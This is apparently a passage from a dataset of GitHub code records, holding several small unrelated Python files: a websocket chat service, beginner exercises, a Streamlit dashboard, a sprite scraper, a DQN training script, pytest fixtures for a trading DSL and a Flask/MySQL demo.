Room:\n room = await self._rooms.insert_one(\n 
Room(admin_id=user.id, name=chat_name, members=[user.id])\n )\n return room\n \n async def save_message(self, author: str, text: str, room_id: str) -> Message:\n message = await self._messages.insert_one(Message(author=author, text=text))\n room = await self._rooms.get(room_id)\n room.messages.append(message.id)\n await room.save()\n return message\n\n async def get_chat(self, room_id: str) -> Room:\n try:\n chat = await self._rooms.get(room_id)\n except ValidationError:\n return None\n return chat\n\n async def get_user(self, user_id: str) -> User:\n user = await self._users.get(user_id)\n return user\n\n async def add_user_to_chat(self, user_id, room_id: str) -> Room:\n room = await self._rooms.get(room_id)\n room.members.append(user_id)\n await room.save()\n return room\n\n async def get_user_chats(self, user_id: str) -> list[Room]:\n rooms = await self._rooms.find(Room.members == user_id).to_list()\n return rooms\n \n async def get_chat_history(self, room_id: str, offset: int = 0, limit: int = 10):\n room = await self._rooms.get(room_id)\n messages = await self._messages\\\n .find_many({\"_id\": {\"$in\":room.messages}})\\\n .skip(offset).limit(limit).to_list()\n return messages\n\n async def ws_receive(self, websocket: WebSocket, username, room_id, user_id):\n if await self.redis_service.user_room_exists(username, room_id) is False:\n await self.redis_service.add_user_to_room(username, room_id)\n await self.redis_service.announce(room_id, username, \"join\")\n try:\n while True:\n message = await websocket.receive_json()\n\n fields = {\n \"type\": \"message\",\n \"username\": username,\n \"message\": message,\n \"room\": room_id,\n }\n await self.redis_service.send_message_to_stream(room_id, fields)\n await self.save_message(author=user_id, text=message, room_id=room_id)\n except WebSocketDisconnect:\n await self.redis_service.remove_user_from_room(username, room_id)\n await self.redis_service.announce(room_id, username, \"leave\")\n await websocket.close()\n\n async def ws_send(self, websocket: WebSocket, room_id):\n last_id = b\"$\"\n while True:\n events = await self.redis_service.read_data_stream(room_id, last_id)\n for event in events:\n last_id = event[1][0][0]\n fields = event[1][0][1]\n await websocket.send_json(fields)\n await asyncio.sleep(1)\n","repo_name":"neekrasov/ws_chat","sub_path":"chat/services/chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":5323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"72428113170","text":"import math\n\nmovie = input()\nmovie_duration = int(input())\nbreak_duration = int(input())\n\nlunch_duration = break_duration / 8\nrelax_time = break_duration / 4\n\ntime_for_movie = break_duration - lunch_duration - relax_time\n\ndiff = abs(time_for_movie - movie_duration)\n\nif time_for_movie >= movie_duration:\n print (f'You have enough time to watch {movie} and left with {math.ceil(diff)} minutes free time.')\nelse :\n print (f\"You don't have enough time to watch {movie}, you need {math.ceil(diff)} more minutes.\")\n","repo_name":"Javor18/Programming_Basics_with_Python","sub_path":"Conditional_Statements/Exercise/Lunch_Break.py","file_name":"Lunch_Break.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41832767270","text":"\ndef check_user_input(userQuestion, in_range=(0,0), y_or_n = False, is_date = False):\n\n checking = True\n while checking:\n userInput = 
input(userQuestion + '\\n')\n\n if is_date:\n if userInput[2] == '/' and userInput[5] == '/' and len(userInput) == 10:\n try:\n test = int(userInput[0:2])\n test = int(userInput[3:5])\n test = int(userInput[6:10])\n except:\n print('Error: Incorrect date format')\n else:\n checking = False\n return userInput\n else:\n print('Error: Incorrect date format')\n\n if in_range != (0,0):\n try:\n test = int(userInput)\n except:\n print('Error: Input is not number')\n else:\n if int(userInput) in range(in_range[0], in_range[1]):\n checking = False\n return int(userInput)\n else:\n print('Error: Number not an option')\n \n if y_or_n:\n yn = ['Y', 'y', 'N', 'n']\n if userInput in yn:\n if userInput in yn[:2]:\n checking = False\n return True\n else:\n checking = False\n return False\n else:\n print('Error: Input not Y/N')\n\n\n","repo_name":"finnbassill/Walmart-Order","sub_path":"Walmart-Order/mac/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20909949964","text":"#importing libraries\r\nimport streamlit as st\r\nimport numpy as np\r\nimport pandas as pd \r\nimport os\r\nimport matplotlib.pyplot as plt\r\nplt.style.use(\"seaborn-whitegrid\")\r\nimport seaborn as sns\r\nfrom collections import Counter\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nst.set_page_config(\r\n page_title=\"World Ranking Universities\",\r\n page_icon=\"🧊\",\r\n layout=\"centered\",\r\n initial_sidebar_state=\"expanded\",\r\n menu_items={\r\n 'Get Help': 'https://www.extremelycoolapp.com/help',\r\n 'Report a bug': \"https://www.extremelycoolapp.com/bug\",\r\n 'About': \"# This is a header. This is an *extremely* cool app!\"\r\n }\r\n)\r\n\r\nst.balloons()\r\nst.title('World Ranking Universities')\r\n\r\nst.success(\"Welcome to the analysis of your future! 
Listen to some relaxing music while exploring our page.\")\r\n\r\n#importing dataset\r\ntimesData = pd.read_csv(\"timesData.csv\")\r\n\r\n\r\naudio_file = open('Welcome Ringtone.oga', 'rb')\r\naudio_bytes = audio_file.read()\r\n\r\nst.audio(audio_bytes, format='audio/ogg')\r\n\r\nif st.checkbox('Show head of data'):\r\n st.subheader('data head')\r\n st.write(timesData.head())\r\n\r\n\r\nimport plotly\r\nimport plotly.graph_objs as go\r\n\r\n\r\n#Line chart:\r\ndf = timesData.iloc[:100, :]\r\n\r\nline1 = go.Scatter(\r\n x = df.world_rank, \r\n y = df.citations, \r\n mode = \"lines\", \r\n name = \"citations\", \r\n marker = dict(color = 'rgba(16, 112, 2, 0.8)'),\r\n text= df.university_name) \r\n\r\nline2 = go.Scatter(\r\n x = df.world_rank,\r\n y = df.teaching,\r\n mode = \"lines+markers\",\r\n name = \"teaching\",\r\n marker = dict(color = 'rgba(255, 0, 0, 0.8)'),\r\n text= df.university_name)\r\n\r\ndata = [line1, line2]\r\nlayout = dict(title = 'Line Chart representing the Citation and Teaching vs World Rank of Top 100 Universities',\r\n xaxis= dict(title= 'World Rank',ticklen= 5,zeroline= False, gridcolor='rgb(248, 248, 255)')\r\n )\r\n\r\nfig1 = dict(data = data, layout = layout) \r\n\r\nst.write(fig1)\r\n\r\nif st.button('Explanation', 1):\r\n st.write('The line chart above shows that the for almost all the world ranked universities, the citations ranking was higher than the teaching ranking.This proves that the citation ranking is an important criteria for the world universities ranking.')\r\n\r\n\r\n\r\n#Bar Chart and Line Chart\r\nfrom plotly import tools\r\nimport matplotlib.pyplot as plt\r\n\r\ndf2016 = timesData[timesData.year == 2016].iloc[:7,:]\r\n\r\ny_saving = [each for each in df2016.research]\r\ny_net_worth = [float(each) for each in df2016.income]\r\nx_saving = [each for each in df2016.university_name]\r\nx_net_worth = [each for each in df2016.university_name]\r\n\r\ntrace0 = go.Bar(\r\n x=y_saving,\r\n y=x_saving,\r\n marker=dict(color='rgba(171, 50, 96, 0.6)',line=dict(color='rgba(171, 50, 96, 1.0)',width=1)),\r\n name='research',\r\n orientation='h',\r\n)\r\n\r\ntrace1 = go.Scatter(\r\n x=y_net_worth,\r\n y=x_net_worth,\r\n mode='lines+markers',\r\n line=dict(color='rgb(63, 72, 204)'),\r\n name='income',\r\n)\r\n\r\nlayout = dict(\r\n title='Bar Chart and Line Chart comparing the Research to Professors Income of top 7 Universities in 2016',\r\n yaxis=dict(showticklabels=True,domain=[0, 0.85]),\r\n yaxis2=dict(showline=True,showticklabels=False,linecolor='rgba(102, 102, 102, 0.8)',linewidth=2,domain=[0, 0.85]),\r\n xaxis=dict(zeroline=False,showline=False,showticklabels=True,showgrid=True,domain=[0, 0.42]),\r\n xaxis2=dict(zeroline=False,showline=False,showticklabels=True,showgrid=True,domain=[0.47, 1],side='top',dtick=25),\r\n legend=dict(x=0.029,y=1.038,font=dict(size=10) ),\r\n margin=dict(l=200, r=20,t=70,b=70),\r\n paper_bgcolor='rgb(248, 248, 255)',\r\n plot_bgcolor='rgb(248, 248, 255)',\r\n)\r\n\r\nannotations = []\r\ny_s = np.round(y_saving, decimals=2)\r\ny_nw = np.rint(y_net_worth)\r\n\r\n# Adding labels\r\nfor ydn, yd, xd in zip(y_nw, y_s, x_saving):\r\n # labeling the scatter savings\r\n annotations.append(dict(xref='x2', yref='y2', y=xd, x=ydn - 4,text='{:,}'.format(ydn),font=dict(family='Arial', size=12,color='rgb(63, 72, 204)'),showarrow=False))\r\n # labeling the bar net worth\r\n annotations.append(dict(xref='x1', yref='y1', y=xd, x=yd + 3,text=str(yd),font=dict(family='Arial', size=12,color='rgb(171, 50, 
96)'),showarrow=False))\r\n\r\nlayout['annotations'] = annotations\r\n\r\n# Creating two subplots\r\nfig2 = tools.make_subplots(rows=1, cols=2, specs=[[{}, {}]], shared_xaxes=True,\r\n shared_yaxes=False, vertical_spacing=0.001)\r\n\r\nfig2.append_trace(trace0, 1, 1)\r\nfig2.append_trace(trace1, 1, 2)\r\n\r\nfig2['layout'].update(layout)\r\n\r\nst.write(fig2)\r\n\r\nif st.button('Explanation', 2):\r\n st.write('The figure below shows that while Harvard University has the highest research ranking, its professors income are the lowest, while the research ranking of Massachussets university is the lowerst, they have the 2nd higher income in 2016.')\r\n\r\n\r\ndf2016 = timesData[timesData.year == 2016].iloc[:7,:]\r\npie1 = df2016.num_students\r\n\r\npie1_list = [float(each.replace(',', '.')) for each in df2016.num_students] \r\nlabels = df2016.university_name\r\n\r\ndata= [\r\n {\r\n \"values\": pie1_list,\r\n \"labels\": labels,\r\n \"domain\": {\"x\": [0, .5]},\r\n \"name\": \"Number Of Students Rates\",\r\n \"hoverinfo\":\"label+percent+name\",\r\n \"hole\": .05,\r\n \"type\": \"pie\"\r\n }]\r\n\r\nlayout={\r\n \"title\":\"Pie Chart representing the Students rate of top 7 Universities in 2016\",\r\n \"annotations\": [\r\n { \"font\": { \"size\": 20},\r\n \"showarrow\": False,\r\n \"text\": \"Number of Students\",\r\n \"x\": 0.20,\r\n \"y\": 1\r\n },\r\n ]\r\n }\r\n\r\nfig3 = go.Figure(data=data, layout=layout)\r\n\r\nst.write(fig3)\r\n\r\nif st.button('Explanation', 3):\r\n st.write('The pie chart above shows that the highest rate of students is found in Harvard University, while the lowest rate of students is found in California Insitute of Technology.')\r\n\r\n\r\n#Pie Chart\r\nimport plotly.figure_factory as ff\r\n\r\ndataframe = timesData[timesData.year == 2015]\r\ndata2015 = dataframe.loc[:,[\"research\",\"international\", \"total_score\"]]\r\ndata2015[\"index\"] = np.arange(1,len(data2015)+1)\r\n\r\nfig4 = ff.create_scatterplotmatrix(data2015, diag='box', index='index',colormap='Portland',\r\n colormap_type='cat',\r\n height=700, width=700, title = \"Scatterplot Matrix representing the correlation between research, international and total score.\")\r\n\r\n\r\n#Multiple Sub-plots\r\ntrace1 = go.Scatter(\r\n x=dataframe.world_rank,\r\n y=dataframe.research,\r\n name = \"research\"\r\n)\r\ntrace2 = go.Scatter(\r\n x=dataframe.world_rank,\r\n y=dataframe.citations,\r\n xaxis='x2',\r\n yaxis='y2',\r\n name = \"citations\"\r\n)\r\ntrace3 = go.Scatter(\r\n x=dataframe.world_rank,\r\n y=dataframe.income,\r\n xaxis='x3',\r\n yaxis='y3',\r\n name = \"income\"\r\n)\r\ntrace4 = go.Scatter(\r\n x=dataframe.world_rank,\r\n y=dataframe.total_score,\r\n xaxis='x4',\r\n yaxis='y4',\r\n name = \"total_score\"\r\n)\r\n\r\ndata = [trace1, trace2, trace3, trace4]\r\nlayout = go.Layout(\r\n xaxis=dict(\r\n domain=[0, 0.45]\r\n ),\r\n yaxis=dict(\r\n domain=[0, 0.45]\r\n ),\r\n xaxis2=dict(\r\n domain=[0.55, 1]\r\n ),\r\n xaxis3=dict(\r\n domain=[0, 0.45],\r\n anchor='y3'\r\n ),\r\n xaxis4=dict(\r\n domain=[0.55, 1],\r\n anchor='y4'\r\n ),\r\n yaxis2=dict(\r\n domain=[0, 0.45],\r\n anchor='x2'\r\n ),\r\n yaxis3=dict(\r\n domain=[0.55, 1]\r\n ),\r\n yaxis4=dict(\r\n domain=[0.55, 1],\r\n anchor='x4'\r\n ),\r\n title = 'Multiple Subplots representing the Research, citation, income and total score VS World Rank of Universities'\r\n)\r\nfig5 = go.Figure(data=data, layout=layout)\r\nst.write(fig5)\r\n\r\nif st.button('Explanation', 5):\r\n st.write('The subplots above show that there is a positive correlation 
between the total score of the university rank and the income and citations they have. While there is a negative correlation between research and total income, which proves that the research has no impact on the ranking of the university if there was no citations for these researches.')\r\n\r\n\r\n","repo_name":"rawane1521/myProject","sub_path":"code1.py","file_name":"code1.py","file_ext":"py","file_size_in_byte":8605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28849417853","text":"class Solution:\n def closeStrings(self, word1: str, word2: str) -> bool:\n '''\n T: O(n) and S: O(n)\n '''\n if len(word1) != len(word2): return False \n \n c1, c2 = Counter(word1), Counter(word2)\n \n return c1.keys() == c2.keys() \\\n and Counter(c1.values()) == Counter(c2.values())\n","repo_name":"shoaibur/Software-Engineering","sub_path":"Leetcoding-Actions/Explore-Monthly-Challenges/2021-01/22-determineIfTwoStringsAreClose.py","file_name":"22-determineIfTwoStringsAreClose.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"42821530712","text":"import re;\n\n\ntext = \"А ты знал, что ВТ – лучшая кафедра в ИТМО?\"\nphrase_pattern = \"ВТ(\\W+\\w+){,3}\\W+ИТМО\"\nword_pattern = \"\\w+\"\n\ndef proga():\n phrase = re.search(phrase_pattern, text)\n result = re.findall(word_pattern, phrase.group(0)) \n string = \"\"\n for word in result:\n string += word + \" \"\n print(string) \n\nproga() ","repo_name":"alsiva/progalab4","sub_path":"reg_exp.py","file_name":"reg_exp.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10168839281","text":"#importujemy odpowiedni moduł\r\nimport matplotlib.pyplot as plt\r\n\r\n#aby narysowac wykres potrzebujemy dwóch tablic liczb: x i y\r\n#y to będzie tablica z wartościami funkcji x**2\r\n#w zakresie do petli sa podane wartosci\r\n#w petli obliczone elementy dorzucamy do listy\r\n#mozna tez napisac y.append(liczba**2)\r\nx=[-4,-3,-2,-1,0,1,2,3,4]\r\ny=[]\r\n\r\nfor liczba in x:\r\n y+=[liczba**2]\r\n\r\n\r\n#Ponizsze 3 komendy sa podobne do matlabowych\r\n# Plot rysuje, xlabel i ylabel nadaja nazwy dla etykiet\r\n\r\nplt.plot(y)\r\nplt.xlabel('X')\r\nplt.ylabel('Y')\r\n\r\n\r\n#jeśli chcemy narysowac jeszcze jeden wykres o innych kolorach\r\ny1=[]\r\nfor liczba in x:\r\n y1+=[liczba**2+1]\r\n\r\nplt.plot(x,y1,'ro-')\r\n\r\n# show pokazuje rysunek\r\nplt.show()\r\n","repo_name":"galursa/UWM","sub_path":"WD/Przyklady/Cw7/Cw7_Przykład1.py","file_name":"Cw7_Przykład1.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28218505183","text":"# This is a tutorial that is posted on pyimagesearch website\n# the first of 2 of 6 segments\n# This segment deals with scarping the database together\n\nfrom bs4 import BeautifulSoup \nimport argparse\nimport requests\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-p\", \"--pokemon-list\", required = True,\n help = \"Path to where the raw Pokemon HTML file resides\")\nap.add_argument(\"-s\", \"--sprites\", required = True,\n help = \" Path where the sprites will be stored\")\nargs = vars(ap.parse_args())\n\n# construct the soup and initialize the list of pokemon names\nsoup = 
BeautifulSoup(open(args[\"pokemon_list\"]).read())\nnames = []\n\n# loop pver all link elements\nfor link in soup.findAll(\"a\"):\n # update the list of pokemon names\n names.append(link.text)\n\n\n# loop over pokemon names\nfor name in names:\n\n # intialize the parsed name as just the lowercase version of the name\n parsedName = name.lower()\n\n # remove apostrophes\n parsedName = parsedName.replace(\"'\",\"\")\n\n # replace periods + space with dash (i.e Mr. Mime = mr-mime)\n parsedName = parsedName.replace(\". \", \"-\")\n\n # handle the case for Nidoran (female)\n if name.find(u'\\u2640') != -1:\n parsedName = \"nidoran-f\"\n\n # handle the case for Nidoran (male)\n if name.find(u'\\u2642') != -1:\n parsedName = \"nidoran-m\"\n\n # downloading the pokemon sprite\n print(\"[x] downloading %s\" %(name))\n url = \"http://img.pokemondb.net/sprites/red-blue/normal/%s.png\" %(parsedName)\n r = requests.get(url)\n\n # if the status conde is not 200, ignore the sprite\n if r.status_code != 200:\n print(\"[x] error donwloading %s\" %(name))\n continue\n # write the sprite to file\n f = open(\"%s%s.png\" %(args['sprites'], name.lower()), \"wb\")\n f.write(r.content)\n f.close()\n\n\n\n\n \n\n\n","repo_name":"AdamBioprinter/OpenCV-Python-Tutorials","sub_path":"opencv/pyimagesearchTuts/Pokedex1.py","file_name":"Pokedex1.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8526252587","text":"import gym\nimport matplotlib.pyplot as plt\nfrom itertools import count\nimport torch\nfrom networks.deep_endemble_NN_model import GaussianMixtureMLP\nfrom buffer import ReplayMemory\nfrom utilis import * \nfrom logger import set_log_file\nimport logging\nfrom networks.DQN_model import DQN\nimport argparse\n\nparser = argparse.ArgumentParser(description='|model|env|')\nparser.add_argument(\"--model\",default=\"ensemble_DQN\",help=\"DQN or ensemble_DQN\")\nparser.add_argument(\"--env\",default=\"MountainCar-v0\",help=\"CartPole-v1|MountainCar-v0|LunarLander-v2\")\nparser.add_argument(\"--BATCH_SIZE\",type=int,default=300)\nparser.add_argument(\"--NUM_episodes\",default=300)\nparser.add_argument(\"--GAMMA\",default=0.99)\nparser.add_argument(\"--TAU\",default=0.005)\nparser.add_argument(\"--PRINT\",default=False)\nparser.add_argument(\"--render_mode\",default=\"rgb_array\")\nparser.add_argument(\"--device\",default=\"cpu\")\nparser.add_argument(\"--NUM_ensemble\",default=5)\nparser.add_argument(\"--file_identify\",default=\"\")\nparser.add_argument(\"--foot_record\",default=False)\nargs = parser.parse_args()\n\n###############################################################################################\n# config the args\n# set the log file\nset_log_file(f\"log/{args.model}_{args.env}_{args.file_identify}.txt\")\n# set env\nenv = gym.make(args.env,render_mode=args.render_mode)\n# Get number of actions from gym action space\nn_actions = env.action_space.n\n# Get the number of state observations\nstate, info = env.reset()\nn_observations = len(state)\n# set device\ndevice = torch.device(args.device)\n\n# set the model\nif args.model==\"DQN\":\n policy_net = DQN(n_observations, n_actions).to(device)\n target_net = DQN(n_observations, n_actions).to(device)\n optimizer = torch.optim.AdamW(policy_net.parameters(), lr=1e-4, amsgrad=True)\nelif args.model==\"ensemble_DQN\":\n policy_net = GaussianMixtureMLP(args.NUM_ensemble,n_observations, n_actions).to(device)\n target_net = 
GaussianMixtureMLP(args.NUM_ensemble,n_observations, n_actions).to(device)\n\ntarget_net.load_state_dict(policy_net.state_dict())\n# set the buffer\nbuffer = ReplayMemory(100000)\n\n##########################################################################################################\n\nsteps_done=0\nif __name__==\"__main__\":\n cum_R=[]\n for i_episode in range(args.NUM_episodes):\n # Initialize the environment and get it's state\n state, info = env.reset()\n state = torch.tensor(state, dtype=torch.float32, device=device).unsqueeze(0)\n E_count=0\n for t in count():\n steps_done+=1\n \n if args.foot_record: \n if steps_done<20000:\n logging.info(f\"foot: {state[0,0].item()} {state[0,1].item()}\")\n # select action accroding to Free energy\n if args.model==\"DQN\":\n action,E=select_action(policy_net,state,env,steps_done)\n elif args.model==\"ensemble_DQN\":\n action,E = select_action_FE(policy_net,state,args.PRINT)\n # count the explore step number\n E_count+=E\n # step forward\n observation, reward, terminated, truncated, _ = env.step(action.item())\n \n reward = torch.tensor([reward], device=device)\n done = terminated \n\n if terminated:\n next_state=None\n else:\n next_state = torch.tensor(observation, dtype=torch.float32, device=device).unsqueeze(0)\n\n # Store the transition in memory\n buffer.push(state, action, next_state, reward)\n\n # Move to the next state\n state = next_state\n\n # Perform one step of the optimization (on the policy network)\n # select action accroding to Free energy\n if args.model==\"DQN\":\n optimize_model(buffer,policy_net,optimizer,target_net,GAMMA=args.GAMMA,BATCH_SIZE=args.BATCH_SIZE) \n elif args.model==\"ensemble_DQN\":\n optimize_model_ensemble(buffer,policy_net,target_net,GAMMA=args.GAMMA,BATCH_SIZE=args.BATCH_SIZE,device=device)\n # soft update th target network\n soft_update_model_weights(policy_net,target_net,args.TAU)\n\n if done:\n print(i_episode,\" step: \",t+1)\n logging.info(f\" {i_episode}, step: {t+1},E: {E_count/(t+1)}\")\n cum_R.append(t+1)\n ensemble=True\n if args.model==\"DQN\":\n ensemble=False\n # getRM(policy_net,False,f\"Q_table_best_action/best_action_{args.model}_{i_episode}_{args.file_identify}.png\",ensemble)\n break\n\n print('Complete')\n plt.plot(cum_R)\n plt.show()\n plt.savefig(f\"imgs/cumR_{args.model}_{i_episode}_{args.file_identify}.png\")\n torch.save(policy_net.state_dict(),f\"models_saved/{args.model}_{i_episode}_{args.file_identify}.pt\") \n\n\n\n ","repo_name":"Chevyyyy/Ensemble_Uncertainty_DQN","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35962964073","text":"def time_diff():\n start_time = input(\"Enter the start time in the format hr-min-sec: \")\n end_time = input(\"Enter the end time in the format hr-min-sec: \")\n start_hr, start_min, start_sec = map(int, start_time.split(\"-\"))\n end_hr, end_min, end_sec = map(int, end_time.split(\"-\"))\n start_time_in_sec = start_hr * 3600 + start_min * 60 + start_sec\n end_time_in_sec = end_hr * 3600 + end_min * 60 + end_sec\n return end_time_in_sec - start_time_in_sec\n\n\nprint(time_diff())\n","repo_name":"sayantan-2/CSE-DSA-LAB","sub_path":"assignment 4/python/programs/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"20957646346","text":"import pytest\nfrom src.interpreter.interpreter 
import Interpreter\nfrom src.infrastructure.global_interface import return_context\nfrom trade.api import API\nfrom trade.config import Config\nfrom src.compiler.compiler import Compiler\nfrom src.symbol_filters.compile_functions import SymbolFilterCompiler\nfrom src.compiler.parser import Parser\nfrom src.infrastructure.database_layer import DataBase\nfrom src.infrastructure.redis_layer import RedisInterface\nfrom src.utils import parse_date, parse_datetime\nimport datetime\nimport os\nimport sys\n\n\n@pytest.fixture(autouse=True)\ndef backend():\n chrdir = os.getcwd()\n path = os.path.join(chrdir,'backend_startup.sh')\n os.system(f\"bash {path}\")\n\n\n@pytest.fixture\ndef update_context_time_invariant():\n def closure(interpreter):\n interpreter.context.update_value(\n \"OPEX\", datetime.date(year=2021, month=11, day=19)\n )\n interpreter.context.update_value(\n \"TODAY\", datetime.datetime(year=2021, month=10, day=25)\n )\n interpreter.context.update_value(\n \"TODAY_DATE\", datetime.datetime(year=2021, month=10, day=25).date()\n )\n interpreter.context.update_value(\n \"DISTANCE_TO_OPEX\",\n parse_date(interpreter.context.get_value(\"OPEX\"))\n - datetime.date(year=2021, month=10, day=15),\n )\n interpreter.context.update_value(\n \"DAYS_UNTIL_OPEX\",\n (\n parse_date(interpreter.context.get_value(\"OPEX\"))\n - datetime.date(year=2021, month=10, day=15)\n ).days,\n )\n interpreter.context.update_value(\n \"PREVIOUS_OPEX\", datetime.datetime(year=2021, month=10, day=15)\n )\n return interpreter\n\n return closure\n\n\n@pytest.fixture\ndef db():\n return DataBase(\"test\")\n\n\n@pytest.fixture\ndef teardown(db):\n yield\n print(\"Tearing down\")\n db.drop_collection(\"working_orders\")\n db.drop_collection(\"positions\")\n\n\n@pytest.fixture\ndef redis():\n return RedisInterface()\n\n\n@pytest.fixture\ndef parser():\n return Parser()\n\n\n@pytest.fixture\ndef symbol_filter_compiler():\n return SymbolFilterCompiler()\n\n\n@pytest.fixture\ndef compiler():\n return Compiler()\n\n\n@pytest.fixture\ndef context():\n return return_context(\"test\")\n\n\n@pytest.fixture\ndef interpreter(context):\n return Interpreter(context)\n\n\n@pytest.fixture\ndef config(context):\n config = Config()\n config.test(context)\n return config\n\n\n@pytest.fixture\ndef api(config):\n return API(config.params)\n\n\n@pytest.fixture\ndef opex_description():\n description = {\n \"strategy\": \"opex\",\n \"symbol_pool\": [\"positioning\", \"!biotech\", \"!earnings\"],\n \"position_description\": {\n \"tradeType\": \"SELL_SHORT\",\n \"positionType\": \"single\",\n \"assetType\": \"EQUITY\",\n \"scheduled_close\": 4,\n \"betsize\": {\n \"per_trade\": [\"*\", \"^BANKROLL\", 0.1],\n \"max_bet\": [\"*\", \"^BANKROLL\", 0.12],\n },\n \"stop\": [\"+\", \"@SYMBOL_PRICE\", [\"*\", \"@SYMBOL_PRICE\", 0.1]],\n \"entry_point\": \"MARKET\",\n },\n \"open_position\": {\n \"days\": [\"10-4\"],\n \"times\": [\"9:30\"],\n \"when\": {\"and\": [[\">\", \"^SPY\", [\"-\", \"^SPY_20_DAY_MEAN\", \"^SPY_SIGMA\"]]]},\n \"symbol_filter\": [\n [\n \"filter_csv\",\n \"stock_fundamentals\",\n [\"list\", \"None\"],\n [\"list\", \"Volume\"],\n \"@symbols\",\n \">\",\n 2000000.0,\n ],\n [\n \"filter_csv\",\n \"IV\",\n [\"list\", \"None\"],\n [\"list\", \"Imp Vol\"],\n \"@symbols\",\n \">\",\n 50,\n ],\n [\n \"filter_csv\",\n \"positioning\",\n [\"list\", \"mean\"],\n [\n \"list\",\n \"scaled_direction_day_0\",\n \"scaled_direction_day_1\",\n \"scaled_direction_day_2\",\n \"scaled_direction_day_3\",\n \"scaled_direction_day_4\",\n ],\n 
\"@symbols\",\n \"<\",\n -0.0025,\n ],\n ],\n },\n \"close_position\": {\"days\": [\"10-4\"], \"times\": [\"15:59\"]},\n }\n\n return description\n\n\n@pytest.fixture\ndef spy_description():\n trade = {\n \"strategy\": \"spy\",\n \"symbol_pool\": [\"load_symbols\", \"SPY\"],\n \"position_description\": {\n \"tradeType\": \"SELL_TO_OPEN\",\n \"assetType\": \"OPTION\",\n \"positionType\": \"spread\",\n \"betsize\": {\n \"per_trade\": [\"*\", \"^BANKROLL\", 0.01],\n \"max_bet\": [\"*\", \"^BANKROLL\", 0.01],\n },\n \"entry_point\": \"2/3rds\",\n \"scheduled_close\": 4,\n \"spread\": {\n \"sell\": {\n \"strike\": [\n \"+\",\n \"^SPY\",\n [\"*\", [\"*\", \"^SPY\", 0.003], [\"-\", \"^DAYS_UNTIL_OPEX\", 3]],\n ],\n \"expiration\": \"^OPEX\",\n \"contractType\": \"PUT\",\n },\n \"buy\": {\n \"strike\": [\n \"round\",\n [\n \"-\",\n \"^SPY\",\n [\"*\", [\"*\", \"^SPY\", 0.006], [\"-\", \"^DAYS_UNTIL_OPEX\", 3]],\n ],\n ],\n \"expiration\": \"^OPEX\",\n \"contractType\": \"PUT\",\n },\n },\n },\n \"open_position\": {\n \"days\": [\"32-4\"],\n \"times\": [\"9:30\"],\n \"when\": {\n \"and\": [\n [\"<\", \"^SPY\", [\"*\", \"^SPY_20_DAY_MEAN\", 1.03]],\n [\">\", \"^SPY\", \"^SPY_20_DAY_MEAN\"],\n ]\n },\n \"symbol_filter\": [[\"in_portfolio\", \"@symbols\", False]],\n },\n \"close_position\": {\n \"days\": [\"31-4\"],\n \"times\": [\"9:30\"],\n \"when\": {\n \"or\": [\n [\"<\", \"^SPY\", \"^SPY_20_DAY_MEAN\"],\n [\">\", \"^SPY\", [\"*\", \"^SPY_20_DAY_MEAN\", 1.03]],\n ]\n },\n },\n }\n\n return trade\n","repo_name":"Morgan-Griffiths/trading_language","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":6558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72775253011","text":"from flask import Flask, render_template\nimport mysql.connector as mydb\n\n# コネクションの作成\nconnector = mydb.connect(\nhost='MySQLが動いているサーバー',\nuser='MySQL��ーザ',\npassword='パスワード',\ndatabase='データベース名',\ncharset=\"utf8\"\n)\napp = Flask(__name__)\n\n@app.route('/')\ndef hello_world():\n return \"Hello world!\"\n\n@app.route(\"/hello\")\ndef hello():\n title=\"FlaskをレンタルサーバXserverで利用する!\"\n subtitle=\"データベースmySQLのInsert,Update,Selectを実行する\"\n return render_template('hello.html', title=title,subtitle=subtitle)\n\n@app.route(\"/select\")\ndef select():\n cursor = connector.cursor()\n sql = \"SELECT id, __name__, age FROM kaiin_table WHERE id=103\"\n cursor.execute(sql)\n result = cursor.fetchall()\n for row in result:\n return \"id:\" + str(row[0]) + \"  name:\" + str(row[1]) + \"さん  age:\" + str(row[2])\n cursor.close()\n connector.close()\n\nif __name__ == \"main\":\n app.run(host='0.0.0.0')","repo_name":"shu0603n/Rest-API","sub_path":"app2.py","file_name":"app2.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70538490131","text":"import os\nimport sys\n\n\nproject_name = \"URLShortner\"\nbuild_directory = \"./build\"\nsrc_path = \"./cmd/URLShortner/main.go\"\n\nproject_build = os.path.join(build_directory, project_name)\n\nos.system(f\"go build -o {project_build} {src_path}\")","repo_name":"strCarne/URLShortner","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} 